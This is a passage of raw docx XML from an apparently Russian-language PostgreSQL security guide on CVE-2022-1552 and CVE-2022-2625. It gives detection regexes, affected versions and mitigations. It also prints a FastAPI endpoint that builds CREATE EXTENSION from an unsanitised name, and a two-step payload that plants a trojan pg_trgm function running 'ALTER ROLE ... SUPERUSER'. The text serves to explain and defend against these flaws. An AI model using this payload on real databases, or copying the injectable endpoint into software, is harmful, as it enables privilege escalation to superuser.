          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не из</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> owner-schema таблицы. То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_X.reports.idx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ссылается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_X.helper()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нормально; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_X.reports.idx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ссылается на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 подозрительно.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pg_indexes.indexdef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\(\(\w+\.\w+\(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (вызов функции из схемы) внутри expression — стоит ревьюить, особенно если functon owner != table owner.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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> функций, используемых в expression-индексах: статический сканер на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER 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GRANT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COPY PROGRAM</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На версиях PG ≤ 14.2 / 13.6 / 12.10 / 11.15 / 10.20 — любой index expression со ссылкой на функцию из чужой schema критичен.</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Уязвимы все ветки PG до фикса 12.05.2022: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Ветка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 до</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14.3</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13.7</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11.15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11.16</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10.20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10.21 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На версиях PG ≥ 14.3 / 13.7 / 12.11 / 11.16 / 10.21 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">закрыта</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SRO применяется к index expressions в ANALYZE/REINDEX/CLUSTER/REFRESH MATVIEW/pg_amcheck.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительная защита в PG 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (релиз 26.09.2024): добавлены predefined role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и table-level privilege </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, позволяющие делегировать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VACUUM</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ANALYZE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REINDEX</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CLUSTER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REFRESH MATERIALIZED VIEW</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LOCK TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без выдачи superuser. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">снижает поверхность атаки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> post-fix: даже если будущий аналогичный CVE появится, можно делегировать обслуживание maintenance-роли без superuser-rights, и эскалация будет ограничена правами этой роли.</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связанная защита: SECURITY DEFINER функция-обёртка для legitimate index expression вызывается с явным SET search_path, что предотвращает hijack.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 Extension scripts CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другой path-to-superuser через подмену объекта. Граница: 3.13.3 — index expression trap; 3.13.4 — function pre-create + extension trigger.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 3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — финальные RCE-векторы, доступные после эскалации до superuser через CVE-2022-1552.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4.2 (Хронология 2022)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст 12.05.2022 fixes (CVE-2022-1552), и 11.08.2022 (CVE-2022-2625 — см. 3.13.4).</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CVE-2022-1552 — https://www.postgresql.org/support/security/CVE-2022-1552/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NIST NVD: CVE-2022-1552 — https://nvd.nist.gov/vuln/detail/CVE-2022-1552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«CREATE INDEX» (expression indexes) — https://www.postgresql.org/docs/current/sql-createindex.html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«Routine Reindexing» (autovacuum context) — https://www.postgresql.org/docs/current/routine-reindex.html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14.3 Release notes (Security Fixes) — https://www.postgresql.org/docs/release/14.3/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17 Release notes (pg_maintain) — https://www.postgresql.org/docs/release/17.0/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R15 (sources/research.md, строки 246–252)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.4 Extension scripts: CREATE OR REPLACE подмена (CVE-2022-2625)</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До PostgreSQL 14.5 (и параллельных minor-фиксов) при выполнении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PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не проверял ownership</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> объектов, которые extension script пытался создать через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE FUNCTION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OR REPLACE VIEW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если в целевой схеме уже существовал объект с таким же именем (созданный атакующим заранее), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">переписывал его metadata, оставляя тело функции атакующее</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и transfer-ил ownership к extension. При последующем вызове функции admin-ом или autovacuum исполнялся код атакующего с правами вызывающей роли (типично superuser, потому что admin сам устанавливает extension).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Application-кода как такового нет — это серверная DDL-атака, требующая только SQL-execution в обычной user-сессии. Уязвимая комбинация — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PG до фикса + admin, готовый запустить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(например, при upgrade contrib-пакета, по плану внедрения новой функциональности, через automated provisioning-скрипт).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если показывать через application — то это admin-tool типа SQL Console (как в 3.7.2a) или migration-runner, где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приходит в обход проверок:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/admin/extensions.py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get_superuser_session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@router.post("/admin/extensions/install")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def install_extension(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    name: str,  # user-selected extension name из admin-UI</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Depends(get_superuser_session),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admin-UI позволяет DBA устанавливать contrib-extensions кликом</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"CREATE EXTENSION IF NOT EXISTS {name}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    await session.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь admin запускает CREATE EXTENSION под superuser. Атакующий заранее создал trojan-функцию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(что было возможно до PG 15), и при установке extension trojan transfer-ится к extension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — двухшаговая атака с deferred trigger</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(от любой роли с CREATE на схеме, типично PUBLIC на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в PG ≤ 14):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Атакующий выбирает целевое extension по списку contrib (см. ниже),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- читает install-script (/usr/share/postgresql/14/extension/pg_trgm--N.sql)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- и видит CREATE OR REPLACE FUNCTION public.gin_extract_value_trgm(text, internal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- → пре-создаёт функцию с тем же именем + сигнатурой:</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FUNCTION public.gin_extract_value_trgm(text, internal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS internal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эскалация: добавить атакующего в superuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE 'ALTER ROLE postgres_attacker SUPERUSER';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN NULL;</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postgres_attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — заранее зарегистрированная роль атакующего. Функция возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">internal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (псевдо-тип) — это требование сигнатуры extension; PostgreSQL разрешает return internal только функциям, у которых хотя бы один параметр имеет internal тип (что соответствует подписи).</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(admin / DBA / automated provisioning через какое-то время):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION pg_trgm;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что происходит до фикса (PG ≤ 14.4 / 13.7 / ...):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- PostgreSQL читает скрипт pg_trgm--1.6.sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
